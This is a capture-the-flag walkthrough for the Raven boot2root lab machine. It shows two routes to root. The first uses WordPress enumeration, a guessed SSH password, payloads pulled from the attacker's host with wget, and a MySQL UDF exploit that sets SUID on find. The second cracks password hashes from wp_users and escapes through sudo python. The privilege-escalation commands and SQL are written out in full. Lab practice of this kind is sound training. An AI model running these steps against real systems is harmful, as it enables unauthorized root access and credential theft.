Hello
everyone and welcome to yet another CTF challenge walkthrough. This time we’ll
be putting our hands on Raven. Raven is a Beginner/Intermediate boot2root machine. There are two
intended ways of getting root and we demonstrate both of the ways in this
article.
Table of contents: (Method
1)
1.
Port scanning and IP
discovery.
2.
Hitting on port 80 and
discovery of WordPress CMS.
3.
WPScanning the
website to discover two users.
4.
Hitting and
bruteforcing port 22.
5.
Enumerating the
active processes using LinEnum script.
6.
Discovery of MySQL.
7.
Fetching the database
username and password from wp-config.php.
8.
Using MySQL to create
a UDF (user-defined function) dynamic library.
9.
Compiling UDF exploit
to a shared library program.
10. Running UDF library program into the victim’s machine.
11. Setting sticky bit on “find.”
12. Getting root access.
13. Reading the flags.
Table of contents: (Method
2)
1.
Getting shell to the
victim and accessing MySQL the same way till step 7 in method 1.
2.
In MySQL shell,
discovering all the databases and tables.
3.
Reading table
wp_users from the database wordpress.
4.
Fetching hashes from
the table wp_users.
5.
Cracking the hash to
get shell to the other user.
6.
Discovering python
has no root required to run.
7.
Spawning root TTY
using python one liner.
8.
Reading the flags.
Let’s get started then!
Discovering the active
devices on a network using netdiscover and getting the IP address of our victim
machine. In this case the IP address holds 192.168.1.102
Using nmap on the victim machine
we got three ports open—22,80 and 111
So we instantly moved to the
port 80 and discovered a website of Raven Security.
On the top right we found a
tab saying “blog” and moved to the webpage only to discover that the victim’s
machine had WordPress CMS installed!
So, the first idea that came
to us was to run a wpscan on the webpage and see what the scan enumerates.
The results returned 2
valuable users made on the victim’s machine:
Michael
and steven.
Now, to proceed further in
the same port was seeing blurry to the eye so we tried hitting port 22 (SSH).
It is a fairly logical hit
and try method to use the same word as both the username and password too.
We logged in to SSH with “michael”
as the username and “michael” and got into the shell successfully!
Then we changed the active
directory to /tmp and imported LinEnum.sh,
a script to enumerate many of the basic and advanced linux details.
It was hosted in a folder on
our local machine and was imported into the victim machine using wget command.
My local IP address was
192.168.1.109 in this case.
Cd /tmp
Chmod 777 LinEnum.sh
After changing the
permissions of the file to executable we ran the script only to find that MySQL
service was running (port 3306 is evident to that).
We found a MySQL-Exploit-Remote-Root-Code-Execution-Privesc vulnerability! (FOR MORE INFO: https://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html)
So, we changed the current
directory to /var/www/html/wordpress and searched for the wp-config file, since
it will have the password to the mysql database.
The password was found to
be: “R@v3nSecurity”
So, we searched for a UDF
dynamic library exploit and it was named “1518.c” in exploit database.
The exploits run by
compiling the raw C code to .so file and then transferring it to the victim
machine and exploiting MySQL vulnerability.
The first step was to
compile it.
Searchsploit –m 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518. -lc
We then fired up a local
server and transferred this 1518.so file to the victim’s /tmp directory since
it is universally readable and writable using the wget command.
wget http://192.168.1.109/1518.so
chmod 777 1518.so
mysql –u root –p
After getting a MySQL shell,
we started exploiting it using the vulnerability we just found
use mysql;
Now, we created a table
called “foo”
In this table, we inserted
the link to the 1518.so file we just imported from local machine to /tmp
directory.
We dumped the same file to
/usr/lib/mysql/plugin/ directory (since it was vulnerable)
In the most important step,
we created a UDF function named do_system, that will invoke the code that implements the function.
Hence, we are invoking the
code “chmod u+s /usr/bin/find” to set the sticky bit on “find”
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile
'/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname
'1518.so';
select do_system('chmod u+s /usr/bin/find');
Now we traversed back to the
directory /tmp and executed commands using the find utility.
Touch raj
Find raj –exec “whoami” \;
Find raj –exec “/bin/sh” \;
Cd /root
Ls
Cat flag4.txt
But since the task is also
to capture all the flags we found it using the command:
Find / -name “flag*.txt”
ALTERNATE METHOD
Reach to the MySQL shell as
above and then follow the alternate approach.
See all the databases and
dump the usernames from wp_users table in the database “wordpress”
Show databases;
Use wordpress;
Show tables;
Select * from wp_users;
We found two hashes but
since we already know the password to Michael, we cracked steven’s password
using john the ripper by pasting the hash into a text file called “hash.”
The password was found to
be: pink84
Logging into steven’s shell
and running sudo –l command we found that Python required no root permission to
run.
So, we spawned a python teletype
(PTY) using python’s one liner.
Su steven
Sudo –l
Sudo python –c ‘import pty;pty.spawn(“/bin/bash”)’
id
So, here it is! Two ways to
root raven. Hope you found it useful.
